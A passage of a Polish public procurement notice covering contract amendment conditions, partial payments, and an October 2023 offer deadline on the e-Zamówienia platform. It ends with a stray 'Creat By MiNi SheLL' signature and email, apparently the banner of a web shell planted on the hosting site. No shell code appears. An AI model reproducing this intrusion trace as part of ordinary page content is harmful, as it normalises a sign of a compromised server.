indywidualnej Wykonawca powinien uwzględnić metodę wyceny i składniki ceny, jakie zastosował do wyliczenia<br/>całkowitej ceny oferty lub tych pozycji, które posiadają najbardziej zbliżony charakter do przedmiotu zmiany. Oprócz<br/>kalkulacji ceny dla przedmiotu zmiany, Wykonawca powinien przedłożyć szczegółową kalkulację ceny tych pozycji, które<br/>posiadają najbardziej zbliżony charakter do przedmiotu zmiany. Zamawiający zaakceptuje propozycję kalkulacji ceny, jeżeli<br/>będzie ona zgodna<br/>z zasadami określonymi powyżej. Jeżeli cena zaproponowana przez Wykonawcę do akceptacji Zamawiającemu będzie<br/>skalkulowana niezgodnie z tymi zasadami, Zamawiający wprowadzi korektę ceny opartą na własnych wyliczeniach.<br/>d) w przypadku przedłużenia się procedury uzyskania materiałów wyjściowych i decyzji administracyjnych, niezbędnych dla<br/>prawidłowej realizacji poszczególnych opracowań części Dokumentacji, nie wynikających z winy Wykonawcy, przy<br/>zastrzeżeniu, że powyższe okoliczności wymagają od Wykonawcy udokumentowania na piśmie, pod rygorem utraty prawa<br/>powoływania się na nie przez Wykonawcę.<br/>e) w przypadkach opisanych w ustawie – prawo zamówień publicznych.<br/>3. W przypadku zaistnienia okoliczności wskazanych w ust. 2 lit. c) i d), termin wykonania umowy zostanie wydłużony<br/>odpowiednio o liczbę dni odpowiadających liczbie dni roboczych koniecznych na wykonanie ponownych opracowań lub ich<br/>elementów , lub wykonanie zmian w opracowaniach lub ich elementach oraz liczbie dni roboczych przedłużenia się<br/>procedur uzyskania materiałów wyjściowych i decyzji administracyjnych niezbędnych dla prawidłowej realizacji<br/>poszczególnych opracowań części Dokumentacji, nie wynikających z winy Wykonawcy. Sobotę strony uważać będą za<br/>dzień roboczy.<br/>4.	W przypadku zaistnienia okoliczności wskazanych w ust. 3, powodujących opóźnienie w wykonaniu Dokumentacji o więcej niż 2 miesiące, Zamawiający dopuszcza możliwość częściowych płatności za wykonanie kompletnego opracowania części Dokumentacji, wskazanych w pozycjach Tabeli Elementów Rozliczeniowych.<br/>Wynagrodzenie płatne będzie przelewem, po wykonaniu i dostarczeniu Zamawiającemu kompletnej części Dokumentacji i dostarczeniu Zamawiającemu prawidłowo wystawionej faktury, wraz z protokołem wstępnego odbioru częściowego, w terminie do 21 dni od dostarczenia tych dokumentów. Treść § 8 umowy stosuje się odpowiednio. Suma płatności częściowych nie może być większa niż 60% wysokości wynagrodzenia brutto wskazanego w § 10 ust. 1, pomniejszonego o wynagrodzenie wskazane w § 10 ust. 2.3. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-02 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W postępowaniu o udzielenie zamówienia, komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl/ Identyfikator (ID) postępowania został wskazany w pkt. 1 Instrukcji dla Wykonawców (Rozdział I SWZ).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wskazuje, iż wymaga, aby zamówienie zostało wykonane w terminie 470 dni od dnia zawarcia umowy, z<br/>zastrzeżeniem § 5 ust. 12, § 6 ust. 2 oraz § 9 Wzoru umowy (Rozdział V SWZ). (Rozdział V SWZ).<br/>4. W nawiązaniu do pkt. 8.1.), Zamawiający wskazuje, iż oferty należy składać zgodnie z zasadami określonymi<br/>w SWZ nie później niż do 02.10.2023 r., do godziny 10:30:00.

Creat By MiNi SheLL
Email: jattceo@gmail.com